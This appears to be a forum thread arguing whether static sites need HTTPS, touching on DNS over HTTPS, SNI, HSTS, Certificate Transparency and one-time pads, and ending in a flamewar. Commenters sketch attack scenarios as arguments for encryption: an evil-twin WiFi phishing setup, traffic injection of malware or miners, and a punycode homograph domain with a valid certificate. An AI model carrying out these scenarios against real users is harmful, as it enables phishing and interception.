If the site is using Cloudflare (free), AWS CloudFront (cheap), or another CDN, it won't have a unique IP address. For now, the domain name will still leak in plaintext through DNS and over the TLS connection in the SNI field, but browsers are planning to implement DNS over HTTPS [1], and encrypted SNI is on the way [2].
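DNS over HTTPS is already testable today, e.g. against Cloudflare's public JSON endpoint. The lookup below travels inside an ordinary HTTPS connection instead of plaintext port-53 UDP:

    # A DoH lookup: the query and answer are invisible to an on-path observer.
    curl -H "accept: application/dns-json" \
      "https://cloudflare-dns.com/dns-query?name=example.com&type=A"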
There's really not a need to. Others have pointed out that your ISP might inject ads, or something similar; another thing is that encrypting only the traffic you want to keep secret leaks the fact that you're doing something you want to keep secret.
These are not issues that are likely to cause great damage, so no, there is no need to encrypt every last bit of traffic. But the bigger question is: "Why wouldn't you encrypt it?" There's really not a lot of reasons not to.
Your argument, out of everyone else's, is the most sane. So lemme point this out:
> But the bigger question is "Why wouldn't you encrypt it"?
You're right. There's not a lot of good reasons I can think of. The best argument I've been able to come up with is ISP-level caching of HTTP traffic, which may save on bandwidth. But my host doesn't even charge for the measly amounts of bandwidth I use, so that's certainly not a concern.
Modern servers have HTTPS hardware-acceleration in the form of AES-NI, so it doesn't even use much more CPU power to use TLS these days.
So really, bandwidth savings from ISP-level caching is the best counter-argument I've got. Which is to say: not a very big concern of mine.
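If you want to sanity-check the AES-NI point above on your own hardware, openssl ships a benchmark that uses the hardware instructions when available:

    # Throughput of the common TLS bulk cipher; AES-NI capable CPUs
    # typically report on the order of gigabytes per second per core.
    openssl speed -evp aes-128-gcm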
Okay, I am going to make a free hotspot that serves your site as the default starting page, but with a JavaScript malware downloader.
People will assume that your page is installing malware on their hardware. Non-tech people will not understand that it was the free hotspot.
Now move a bit further: someone at an ISP or network somewhere in the world injects malware only into the traffic of your page. I visit your page, I get malware installed, or my AV starts alarming. Would they know that it was not your site serving the malware?
But you could do that under HTTPS, with a self-signed certificate and have it load under HTTPS anyway. Or a variety of methods to get an illegitimate certificate trusted to some subset of users.
But I can't do that in the moment. Without HTTPS I sit on the network and see a clear request to your website. I intercept it and cause problems. With HTTPS I need to have planned ahead of time to target your website specifically and spent time and money on getting a bogus cert for your website. If your website is small I am not likely to do that. But I don't care how big your website is once I'm seeing cleartext traffic.
Hmm, well, in this case it's as easy as running a script and clicking a button from this particular host. So I guess there's no major reason not to do it (and it seems like my provider is defaulting to TLS from Let's Encrypt on any new sites made anyway). So it's the new default way of doing things.
I'm not entirely convinced that it solves the MITM attack still. But I'm still not convinced that the arguments a lot of people are making around here necessarily make sense either. A lot of these attacks are fundamentally theoretical and don't seem broadly applicable.
The main argument that convinced me is: it's easy to do, so why not? But the scare tactics that a lot of people in this discussion are using are unsavory to me, and unintelligent IMO.
All 3 of the concerns GP listed are completely agnostic to the topic of the web page or the behavior of its audience. It's not your fellow webpage visitors or community that are most likely to be in a position in the network to be doing MITM attacks.
So the solution is to run code that I have no idea if it will function properly on my host to see if it will work? But this is all supposed to be super easy, right? I was just supposed to be able to run certbot, and now I just need to run this random package that I hadn't heard of until 5 minutes ago.
It's almost like this isn't a super simple process for everyone.
> "Conditional support for OpenBSD's sandbox, Mac OS X, or experimentally on Linux."
What now? I get to experience experimental functionality?
This is like taking a stand against seatbelts. No one can stop you from doing so, but it makes very little sense, and seems to have more to do with an insistence on being contrary than with making a point or actually changing something.
But the heavily flawed PKI is rapidly improving from the dumpster fire it has been. The glaring 'blindly trust every CA to never go rogue' problem is on the edge of being solved, with browsers beginning to require CAs to submit all new certificates to Certificate Transparency logs in order to be accepted. Attackers would have to either compromise multiple targets in detectable ways, or publicly disclose their forged certificate to the world before they can use it, at least once the older certificates from the dark ages of 2017 have all expired in a few years.
Sure, PKI has serious problems. But HTTP without HTTPS has far worse problems. Nothing is perfect. Waiting for the perfect, while failing to help in easy ways that you can do now, is a poor choice.
In any case, HTTPS doesn't protect your site, it protects the users of your site (by protecting the confidentiality and integrity of the data in transit). If you don't care about your users, then those potential users should avoid your site.
MITM attacks have become pervasive. HTTPS was less important years ago, but that time has passed. For example, ISPs, hotels, airlines, and many others have decided that it's okay to attack their customers. Supporting HTTPS is an easy way to help those users. It doesn't need to be perfect to be useful.
Chrome isn't forcing anyone, it's just making it clear to users that a non-https site is insecure, which it is. What's the problem with providing information so that users can make an informed choice about whether to use the site?
Google is the major player pushing everyone to encrypt with HTTPS, with other companies hopping on board. They argued a populist viewpoint, that after what Snowden revealed they need to protect the public, but the real reason they pushed HTTPS so hard has more to do with protecting their business and getting more metadata.
It's no secret ISP's are consolidating and being bought up by media conglomerates who want to secure the distribution method for their product and exclude competitors in a new market. Those companies view the internet like they view cable TV; it exists to deploy entertainment and advertising to the public and to convert people into products for companies. But they need a mechanism to figure out what is engaging, e.g. Nielsen Ratings.
There's only one thing more accurate than the traditional web bug or javascript running on a webpage, and that's actually MITMing the traffic and extracting the data raw. If you own the ISP you can do this. You can also inject ads. Ads and rating websites are something Google has built its business on.
I'm really sure they have a sour taste in their mouth left over from Google Fiber, due to the politics of ILECs trying to protect their literal state-granted monopoly. And in all seriousness, with POTS being retired, the government is granting monopolies over last-mile wire to cable cos.
So Google decided on the nuclear option: we're just going to get everyone to encrypt their traffic, and not just with easily SSLStrip-able stuff. We're going to push the standards organizations to deploy SSL/TLS in a way nobody can crack, then we're going to provide resources like Let's Encrypt to make getting keys cheap, and then we're going to be belligerent whenever the government complains about not being able to get at the traffic.
Now all the ISPs can see are HTTPS connections to AWS, Azure and Google on their equipment; using IPs to try to figure out what site is what doesn't work. They can still attempt to MITM the traffic, replace keys and impersonate key repos, and I'm sure in a lot of cases they do; however, that opens them up to class-action lawsuits and criminal hacking charges. You don't want a citizen organization charging your network architect with violating the wiretap act; network architects are hard enough to work with, and if you give them a reason to tell their employer they are not going to commit a crime, they'll end up fighting their employers tooth and nail. Both of which I'm sure Google would be more than happy to fund to protect its business.
The other advantage you get out of HTTPS is the session re-use feature. When someone re-connects to your webpage, instead of establishing a new connection, they can re-use the session they had before; this reliably tags a device and allows you to identify connections from a device even when IPs are changing, and it would be more accurate than a browser fingerprint. This is not a new technology or mechanism; IPSEC IKE sessions can last years.
In all candor, we've got military-grade encryption protecting general internet traffic at this point and everyone on this forum is going to argue about privacy without understanding where the market is at or why. That speaks volumes to the times we live in and how effective astroturfing and misinformation campaigns are.
> using IP's to try to figure out what site is what doesn't work.
Every mainstream browser sends the server's domain name in plaintext at the start of the TLS connection,[0] so (short of domain-fronting, which browsers don't do) it's generally not a mystery what site clients are talking to, even if they used DNS-over-TLS. ISPs still have that metadata.
TLS session resumption could theoretically be used for tracking users, but why would Google benefit from doing that when it already uses HTTP cookies? The actual benefit is one fewer round trip, making the web, and all of their sites, faster to load.
It's far more plausible that they're pushing to secure the web with HTTPS and Certificate Transparency because an insecure web ecosystem is just plain bad for business, and makes us all more insecure. It doesn't require spite or a zero-sum game of tearing down the competition to explain pushing HTTPS and Certificate Transparency, which lack real nefarious downsides for users.
First, thanks for the link. I didn't know they implemented SNI after TLS 1.0. I had always thought TLS would initiate a connection to the server infrastructure first, then establish another tunnel-in-a-tunnel for sites that are hosted off of the same IP. It seemed like a more sane explanation for what I saw in wireshark and firewall logs. That also explains why older firewall firmware had issues with getting sites out of TLS connections but newer firmware doesn't. Looks like I have more studying to do.
I'll agree with you that there are substantial ancillary benefits to added browser security, well beyond the scope of this discussion, and to continuously hardening any infrastructure in general. From a business perspective, those are always worthwhile investments in and of themselves, simply because good security means you have a disciplined, well-thought-out system in place. But you cannot discount the fact that traditional television is a direct competitor to Google and the internet in general, and that this is a primary motivating factor in their decision to enforce encryption. Large companies simply do not mess with their core products purely for the good of the public; doing so shows the company is not loyal to employee or stockholder interests, both of which shouldn't be disregarded, for a variety of reasons. I'll agree companies can decide not to take things too far, but they won't disregard their own interests either. Assuming as much is a naive belief.
They probably meant that the reason is malicious: to spy on traffic. Especially since a good chunk of the top sites on that list are Chinese, and China is known to conduct generalised spying on internet users.
However, in a shitty regime like China, surely the government can ask the websites to just hand over the private keys and disable perfect forward secrecy, allowing government spying while preventing anyone else from doing so.
Which is insanely difficult to do at scale and would take a considerable amount of time and resources. Not to mention being really obvious! I'm happy with making things crazy hard for the bad actors out there.
Please put yourself in the shoes of someone actually operating a site. Every single issue mentioned in that post only affects end-users. Not a single issue for the operator, who has many other issues that are more urgent such as turning a profit, securing that database that got wiped last week, and writing actual content. Point being that the incentive to force https for a static site for an individual site operator is just not that great.
The sad reality is that http->https redirects are like vaccination. In some specific cases they are needed (such as login pages), but for some it's more about herd-immunity (normalizing https usage and ensuring availability). Mind you that there's a solid argument for allowing self-signed certs to allow encrypted but unauthenticated transfer. This mode allows MitM, yet does protect against the threat model of a passive eavesdropper.
"Please put yourself in the shoes of someone actually operating a site." - I run 8 sites right now and one of them is processing 10,000,000,000+ requests a month. I speak from a position of experience on this topic.
"Every single issue mentioned in that post only affects end-users. Not a single issue for the operator" - so don't care about the user and the risks we expose them to, only ourselves? This isn't really an approach I'm happy taking.
With 10B monthly requests, you speak from a position of having an operations team who spend 40+ hours a week on keeping your site secure (possibly even a dedicated security team?). Most sites do not have that luxury. If you're doing that on your own, then you're far from the average site operator that I'm referring to here. In fact, most everyone on HN is not the average site operator I'm talking about here.
My poorly communicated point is that using extreme language like "I'm going to hack your static site" dilutes the message and makes average operators less receptive to more advice in the future. Troy does a lot of good work on reducing friction and on advocacy, but sometimes he puts out more extreme content like this, which makes me worry that it may have the opposite effect.
PS - Do you think the vaccine analogy works? I'd appreciate some advice on how to improve it
Yes. When you make a website, your obligation is to your users. Can you imagine any other engineering field where people were willing to say "well, that's a problem for my customers and not a problem for me" and think that was okay?
Let's sum the discussion up - the advantages of HTTPS on static websites is that the content can't be (1) sniffed, (2) manipulated. To which I reply that (1) the person able to sniff your network traffic is also able to see or quite reliably predict what URLs you visit, and (2) if someone is modifying your network traffic specifically, you have much bigger problem than the one that could be solved by HTTPS. And really, each time I hear "HTTPS is secure" I get frustrated, as if people really had no idea how these protocols work.
You're thinking too narrow. Attackers cast wide nets then narrow down the attack to what they've caught in the net. They don't blindly bait individual traps targeting individual users and hope they get a catch.
I'm a hacker at a local Starbucks. I go there every Thursday and use a WiFi Pineapple in my backpack. By naming my WiFi access point similar to the Starbucks' free WiFi I trick a few dozen people a day to connect through my Pineapple instead of the Starbucks provided WiFi. Over a period of a few weeks I log all traffic and devices. I see a number of regulars - many with their own unique browsing habits. I create a few phishing sites to target these unfortunate users who routinely browse at the coffeeshop. Over the course of the next few days I MITM all traffic in the shop and successfully phish a small number of the users. Now imagine a wider net. A collection of compromised networks that don't require my physical presence in a coffee shop and a small team of individuals selecting vulnerable targets based on their browsing patterns.
Neither you nor your users need to be individually targeted by some 3 letter government agency for this attack to work. They only need to be an unfortunate victim and you only need to be too lazy to spend 10-15 minutes setting up a TLS certificate.
This attack is heavily thwarted by sites using TLS certificates. I'd need to get my hands on a number of invalid certificates and even that can be thwarted by HSTS. Now instead of my attack being completely transparent I need to worry about raising suspicion of users browsing https:// sites not getting errors about invalid certificates.
Even on a completely static site one could introduce links, if one can manipulate content. Create a fake blog post linking to Reddit asking for support; make up a story that a family member fell ill and please donate to your Go Fund Me. Add a cryptocoin-miner JavaScript. The possibilities are quite endless when you have full control to manipulate a website and an easy way to make a profit off of someone else's reputation, audience, and laziness.
The point is, if you're able to manipulate someone else's network traffic, you will be able to modify their DNS traffic as well, and HTTPS won't help with that - you can do all these things you listed and worse.
That's why I cringe whenever I hear the mass propaganda that "HTTPS is secure". It encrypts traffic between the two endpoints, that's it.
To which browsers will warn the user that the certificate is invalid - something that, on an HTTP site, the user would never be made aware of. The user would then need to ignore the certificate warnings, at which point you've done your job by having HTTPS; the rest is up to the user not to ignore security warnings, and you can't control that part. Generating false certificates at scale for an attack on a number of websites is unlikely - even with the Comodo/DigiNotar blunders of the past. Especially when the argument against these attacks is "nobody would attack me anyway" (by not requiring attackers to jump through the hoop of getting a fake cert, you're only making it easier for them to target your visitors).
If they send your user to https://dvfjsdhgfv.com (malicious server) instead of https://dvfjsdhgfv.com (your server), the browser will yell at them about the site being insecure. If they try to use http://dvfjsdhgfv.com, your user can see that it isn't secure. They would need a fake certificate for dvfjsdhgfv.com to serve with their malicious version of the site. Arguing against the increased security because theoretical attacks exist is a bit misguided - especially when certificates have been revoked and CAs have been blacklisted or gone out of business for this behavior. It's extremely uncommon - there have only been a handful of instances of it occurring/being caught (an important distinction, I'm sure you'd point out). Because of the difficulty of getting a fraudulent cert signed by a CA, attackers tend to only go after the big fish (Google/Alibaba/Facebook) and hope they don't get caught quickly.
If fake certificates were as common as an unlocked bike left in central L.A. getting stolen, the argument would be a lot stronger.
>It encrypts traffic between the two endpoints, that's it.
Which is why it is important. The attack is called "man in the middle", not "man at the ends". Also, "mass propaganda"? Propaganda from whom, exactly?
I don't understand the refusal to implement https, even on static sites. It takes literally minutes and provides additional security to your readers/users. Refusal to do so is laziness at best and maliciousness at worst. I have a personal file host that receives <5 unique views/day, mostly only by friends, and 99% of all traffic only comes from me - I still took the time to set up TLS [1]. It took me under 10 minutes to implement and it was my first time ever doing so. If you expect to have 0 visitors ever why not just use localhost?
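For anyone who thinks even 10 minutes is too much: with Let's Encrypt's certbot it's roughly one command (assuming an nginx server and a domain you control; example.com is a placeholder):

    sudo certbot --nginx -d example.com

certbot obtains the certificate, rewrites the nginx config to serve HTTPS, and (on most distro packages) schedules automatic renewal.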
> To which browsers will warn the user that the certificate is invalid.
Only if the attacker is very, very stupid. They will happily redirect the request for paypal.com to a homograph domain that displays like paypal.com but is actually https://www.xn--paypl-7ve.com (which Let's Encrypt will happily give you a certificate for). The latter looks exactly like paypal.com and has a green padlock - so for an unsuspecting user it's "secure". Only with DoH implemented correctly could you talk about the benefits you mentioned; without it, HTTPS only gives the user a false sense of security. Seriously, people need to be aware of that.
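For the curious, the mapping from the lookalike name to that xn-- form is mechanical. A minimal Python sketch - U+0430 is the Cyrillic "а", visually identical to the Latin "a":

    # IDNA-encode a homograph of paypal.com
    spoofed = "payp\u0430l.com"   # renders as "paypal.com" in vulnerable UIs
    print(spoofed.encode("idna").decode("ascii"))   # xn--paypl-7ve.com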
I'm aware of that attack. I'm not sure if you're aware, but the only modern browser it still works against is Firefox.
Chrome patched it in Version 58, and Opera patched it not long after. Safari and Edge quickly followed suit (or always displayed the punycode), and I believe IE has always shown punycode. That leaves Firefox as the only browser with significant user share that's susceptible to this attack - at least for users who haven't enabled `network.IDN_show_punycode` in about:config, which is probably most (if not all) users who haven't heard of this attack. Firefox is ~6% market share, so this attack would fail on ~94% of your viewers as long as they were paying any attention to the domain. Probably the only way Mozilla will stop dragging their feet in joining everyone else is if someone creates a malicious punycode version of a Mozilla domain with a cert and brings the battle to their doorstep.
This isn't an argument against TLS/HTTPS - this is an argument against Firefox as far as I'm concerned.
To be clear, I'm not against HTTPS at all. I'm against exaggerating by marketing it as "secure", and on insisting on its benefits in the case of static websites, where the case is very weak.
Even if you don't use punycode, many users are still vulnerable to another type of attack that Let's Encrypt allows:
Even without altering the network traffic, many people fall victim to these vicious tricks. The big question here is how much attention you pay to the address bar.
Nevertheless, the benefits of HTTPS are obvious - there definitely is some protection when the user is sending some data. But for reading a static website, I'm sorry, but I hardly see any benefit. I installed Let's Encrypt on all my websites, but each time I see someone calling it "secure" I really get frustrated.
Users being ignorant (not dumb, just ignorant) doesn't make it less secure. The user ignoring the security benefits, or not knowing where/how to check things, or being complacent and simply not checking, doesn't make it less secure. I don't have any good metaphors for it - but the problem is 99.98% on the users and 0.02% "this could probably be better". Even with giant red warnings saying a site is insecure, an absurd number of users just ignore the warnings and click past them (these users are also not necessarily dumb... too many legitimate programs and websites have conditioned users to click past warnings and errors to get things to work).
Every single one of those paypal.com phishing URLs issued could be prevented if users understood how domains work. That's asking an awful lot, I know.
Security, much like any other form of personal safety, is equal parts following protocol and being educated about the dangers. You can't reasonably protect yourself from something you don't know exists, and you won't protect yourself from danger if you don't follow protocol (see also: OSHA, lab safety). If the user's understanding is "https/green padlock = correct site!", that's terrible, I agree. If the understanding is "https = secure!", that's better but a bit misguided - a secure connection with a malicious server probably isn't what the user has in mind when thinking "secure". But even this misguided approach is a vast improvement over the alternative of "nothing at all", which is why there has been such a strong push towards it. It's quite literally "something is better than nothing" applied to the general population of users, who will probably never be educated enough to protect themselves properly.
By your last reply I had kinda pieced together that your issue is more with the "https=secure!" generalization and not necessarily an "https isn't any more secure than http" argument.
>The big question here is how much attention do you pay to the address bar.
I check the cert for every site I visit - although if I were to become the victim of a MITM attack using DNS spoofing while in the middle of browsing a site and it was targeted directly at me... I don't check the cert on every page load so would probably be fooled for that small window. I also don't lock my front door when I go get the mail, it's a risk I'm willing to take. I understand this makes me in the 0.001% of "maybe a bit too paranoid" users - if there are even that many of us.
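For anyone wanting to do the same check outside the browser, OpenSSL's CLI makes it quick (example.org is a placeholder):

    # print who issued the cert, for whom, and its validity window
    openssl s_client -connect example.org:443 -servername example.org </dev/null \
        | openssl x509 -noout -subject -issuer -dates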
>But for reading a static website, I'm sorry, but I hardly see any benefit.
The benefit is very small but still existent. Since the time to implement is on the order of minutes instead of days/weeks, I can't see a good argument against taking the time to do it - even if it only ever protects a single user.
Well, it's almost nonexistent. To reiterate: if the attacker can only sniff your traffic, they will see which static websites you visit and that's it - whether you use HTTPS or not. On the other hand, if the attacker can modify your network traffic, they can attack you in a million ways via any dynamic website (i.e. one requiring some interaction on your part - sending a login etc.). Such an attack on a static website makes no sense when you can do so much more damage everywhere else. Can we agree on that? If so, I find Google's past policy of marking websites with forms etc. as insecure pretty responsible, and I applaud it. Whereas now it looks like blackmail on their part. And I still don't have the feeling I'm protecting any of the users who visit my static websites; I'm just forced to do it because Google rules the Internet now.
Doesn't HSTS thwart this? Unless paypal.com were omitted from the preload list, AND you had never browsed to paypal.com before with that browser, it should refuse to connect over HTTP and the attacker won't be able to issue their redirect. It will try HTTPS instead and immediately fail out of certificate validation.
That wasn't quite what they were talking about. They were talking about IDN phishing [0], not http->https redirection (which is what HSTS is directed towards). And since we're talking about DNS redirection, the http:// handshake against the legitimate server never happens; you're only ever visiting a malicious website, for which the certificate checks would all fail - except visually, in the case of IDN phishing, which only works against Firefox users.
No, HSTS relies on the server sending the relevant header to the web browser. In this scenario you have total control over all servers the user connects to.
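For reference, HSTS is nothing more than a response header the browser caches, e.g.:

    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

If the first visit is already MITMed - or the attacker controls DNS and the user never reaches the real server - that header is never delivered, which is the gap the browser preload lists exist to close.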
I'm opposed to HTTPS everywhere because it comes with a lot of code (like openssl) and a complicated paradigm (pki). We can do better and simpler at the same time.
Perhaps something like content based addressing, or using something like certificate transparency to protect site contents.
The problem with https everywhere is that - for all its good aspects - it adds a layer of fragility to the web. It seems like we're leaving behind the days when a website could simply be, untouched, for decades. Now if you don't update your TLS certificates every few months, the thing goes poof.
It would be nice if there was a good way to publish content to the web without having to tend it constantly.
The only way you could do that is on a hosted platform where they do maintenance for you. There's no way a server would last online for decades without being patched; it would have been hosed countless times over by now.
Installing certs is just as routine as installing patches: do it every 6 months if you like, but certainly not every 10+ years!
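And the every-6-months part automates away; with Let's Encrypt's certbot a single cron entry suffices (the schedule is illustrative - modern distro packages usually ship an equivalent systemd timer):

    # twice a day, renew any certificate within 30 days of expiry
    0 */12 * * * certbot renew --quiet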
A one-time pad requires a pre-shared key of enormous length to be effective on the World Wide Web. An impossible plan can be vacuously "better and simpler at the same time", guaranteed.
The issue with one time pads isn't their security. That's fine.
The issue is key management. Both parties need the same key and it has to be at least as large as the data you want to send. Each set of parties needs a different key.
If you had a method to securely transmit such keys then you could just transmit your data over it instead.
This is why one time pads are only used by countries to communicate with staff overseas. You can send the pads by diplomatic courier for use in communication later. There is no equivalent mechanism for your web activity and every site on earth.
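For concreteness: the cipher itself is a one-liner, and the pain is entirely in getting the pad to both sides. A minimal Python sketch:

    import secrets

    def otp(data: bytes, pad: bytes) -> bytes:
        # encryption and decryption are the same XOR operation
        if len(pad) < len(data):
            raise ValueError("pad must be at least as long as the data")
        return bytes(d ^ p for d, p in zip(data, pad))

    message = b"attack at dawn"
    pad = secrets.token_bytes(len(message))  # pre-shared securely, used exactly once
    ciphertext = otp(message, pad)
    assert otp(ciphertext, pad) == message

For a website, the pad would have to be at least as large as every byte the site will ever send you, delivered in advance over a channel the attacker can't see - which is exactly the problem TLS already solves.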
Yes there are. The two parties need to agree on a common source. It can be a file somewhere on the web (an image) or something that doesn't exist yet.
How are the two parties supposed to agree when they've never talked to each other before?
If I connect to https://www.SomeWebsiteIveNeverVisited.com/, how is the web server supposed to tell me where to get the key? Or if I, the client, am choosing where to get the key, how do I securely tell the server where to get it?
Passwords work because they're being sent over TLS which we've decided is "good enough".
How is a one-time pad going to fix the issues in TLS?
Honestly, it feels like you're treating "one-time pad" as a buzzword without understanding what it actually is. It's just an encryption technique. It doesn't fix the PKI problem. And your one-time pad key needs to be sent over a secure channel. How do you suppose that happens?
You admit that you're not into crypto, yet above you tried to propose a solution to the problems with PKI, as if the people that ARE into crypto hadn't thought of it.
You show your values and you prove nothing with that sentence.
Experts are often wrong. They exist because we don't know. When we know something, we don't need experts anymore - we just know and apply our knowledge.
Keep in mind the context of this whole conversation. You suggested one-time pads as a solution to PKI and the problems of OpenSSL's large code base being added to projects that need encryption. I don't know how to put this nicely, but it just shows you really don't know what you're talking about.
Yes, sometimes experts get it wrong. Yes, non-experts can sometimes find solutions that the so-called experts couldn't find. I'm not arguing against those claims.
But suggesting one-time pads as a solution to PKI is like seeing someone on the side of the road with a flat tire and suggesting they refill their gas tank.
People have the right to criticize whatever they think is a problem. They don't need to be competent - it's just their freedom to think, applied. I only mentioned my lack of interest in crypto to head off exactly what ended up happening, but I'm not surprised it was useless.
IMHO most people defending HTTPS do so out of loyalty, because they have invested so much time in it, and not because they understand all the details of the crypto behind it.
My message is just: "It's overcomplicated. I quickly found an alternative. I don't buy the meme".
> My message is just: "It's overcomplicated. I quickly found an alternative. I don't buy the meme".
That's exactly my point though. Your proposed alternative does not solve the problem.
We didn't reject your alternative because we think you're incompetent. We didn't reject your alternative because we think HTTPS is fine.
We rejected your alternative because it DOES NOT SOLVE THE PROBLEM. AT ALL. And rather than admit that, you keep defending a point that nobody is arguing against.
Earlier, I asked you a question to try to lead you to understand why your proposal was wrong, and you told me to answer my own questions and called me patronizing.
You continued to defend a point (OpenSSL and PKI have problems) that nobody argued against.
Even now, you keep acting like I'm telling you wrong simply because you admitted you're not into crypto.
And you're calling ME dishonest?
I give up. At this point, I'm quite certain I'm being trolled. Or you think being told you're wrong is a personal attack. In either case, you're not worth my time.
Yes you are. Look at your messages and mine. You're the troll. You use "?" and upper case a lot; I don't. You always try to change the subject instead of agreeing on the problem. It's a lack of integrity.
You feel threatened because you invested time in those tools. It's not rational. It's an emotional reaction.
I use question marks because I'm asking questions. By having you consider what the answer would be, it would lead you to understanding why you were wrong, rather than me having to be explicit. It is an attempt, albeit possibly a poor one, to teach you something by getting you to think about it, rather than being told. If you would rather I just tell you why one-time pads don't solve the problems of PKI and the additional code bloat of using OpenSSL, I will gladly do that.
I use upper case because your responses are frustrating me, because you continue to insist that your suggestion is being dismissed simply because you're not into crypto, when I have said over and over that it was dismissed because it is simply not a valid solution to the problem originally brought up.
Your claim that I keep trying to change the subject instead of agreeing on the problem is baffling me. Which problem are you referring to here?
Maybe I'm just entirely misinterpreting your messages, because you're never specific about what you're trying to refute.
> It's an emotional reaction.
An emotional reaction to what? Please be clear here. Are you still thinking the rejection of one-time pads as a solution to the problems of OpenSSL and PKI is based not on logic or merit, but somehow on emotion? If the answer is yes, then just come out and say so, because I would gladly explain what is wrong with your proposal.
> IMO you just wanna be loyal to the group you think you belong to (you said "we")
What group do you think I'm trying to be loyal to? The fans of OpenSSL? The people that believe everyone should use HTTPS?
> You don't want to admit your part.
What "part" am I supposed to be admitting?
> You just justify your feelings.
...and?
> If you feel threatened, it's your problem.
I don't feel threatened. Why would I feel threatened? You're the one that is acting persecuted for having a proposal get rejected.
OK, Daniel, fair enough about the flamewar, but I have been correct. I only replied. Some people are aggressive; I just told them that they are, and how they are. They don't like that, and it continues endlessly. It's not possible to be a gentleman in those cases.
At the risk of re-igniting the flame war, I want to explain why one-time pads are not the solution, because you kept insisting that I rejected your proposal because I wanted to be loyal to the pro-HTTPS crowd, and not because one-time pads won't actually work.
If you find this patronizing, I apologize. I do not mean to be. But you admit that you're not into crypto, and so I'm assuming you don't understand why your proposal wouldn't work. At the very least, I don't know what you know and don't know.
So, as mentioned, supporting HTTPS on your site adds the problems of OpenSSL's large code base, a history of OpenSSL vulnerabilities (Heartbleed being very well known), and the problems of PKI. These are all well known, and are deemed an acceptable risk because the risks of NOT using HTTPS are much higher.
Now, one-time pads definitely have a lot of benefits. First, they're the only algorithm mathematically proven to be unbreakable when used properly. They are extremely simple to implement, and using them for encryption instead of having to choose between the dozens of algorithms that OpenSSL uses could reduce your encryption library's memory and storage footprint.
Of course, the big caveat here is that they are unbreakable when used properly. This means:
- A pad can never be used more than once -- If a pad is used twice, an attacker who has sniffed two encrypted messages can derive the pad, and therefore decrypt all messages encrypted with that pad. This derivation is quite trivial, especially for text data (see https://crypto.stackexchange.com/questions/59/taking-advanta... and the short sketch after this list).
- The pad must be at least as large as the payload -- If the pad is too short, you have to repeat the pad, causing the problem mentioned above.
- The transferring of the pad needs to be done over a secure channel -- You have to assume that an attacker is always listening and can see all traffic. Even if the server tells the client "Go get the pad from this URL", then the attacker will get that URL as well. Also, keep in mind that the pad needs to be at least the size of the data being sent, which means that if you have to fetch a pad, you're doubling all bandwidth requirements.
- The random number generator used to create a pad must be cryptographically secure -- Being able to predict the supposedly random numbers another system is generating is a well-known attack and has had several proofs of concept. Generating enough cryptographically secure random data for a one-time pad large enough to cover very large transfers just isn't feasible.
- One-time pads do not solve the problems of PKI -- One-time pads do not offer any method of authentication. They're nothing more than a form of symmetric encryption, and symmetric encryption does not attempt to solve the problem of authentication.
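To make the first caveat concrete, here is the pad-reuse leak in a few lines of Python - XORing two ciphertexts made with the same pad cancels the pad entirely:

    import secrets

    p1 = b"send the invoice to bob "
    p2 = b"the password is hunter2 "
    pad = secrets.token_bytes(len(p1))  # reused below - the fatal mistake

    c1 = bytes(a ^ b for a, b in zip(p1, pad))
    c2 = bytes(a ^ b for a, b in zip(p2, pad))

    leak = bytes(a ^ b for a, b in zip(c1, c2))
    assert leak == bytes(a ^ b for a, b in zip(p1, p2))  # pad has cancelled out

From p1 XOR p2, classic crib-dragging (guessing likely words in one message) recovers both plaintexts without ever touching the key.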
That's basically the gist of it. If you want me to explain anything better (Like what symmetric encryption is, and how it differs from asymmetric), I'd be more than happy to. I'm not a crypto expert by any means, but I like to think I have a strong grasp of the basic concepts and ideas.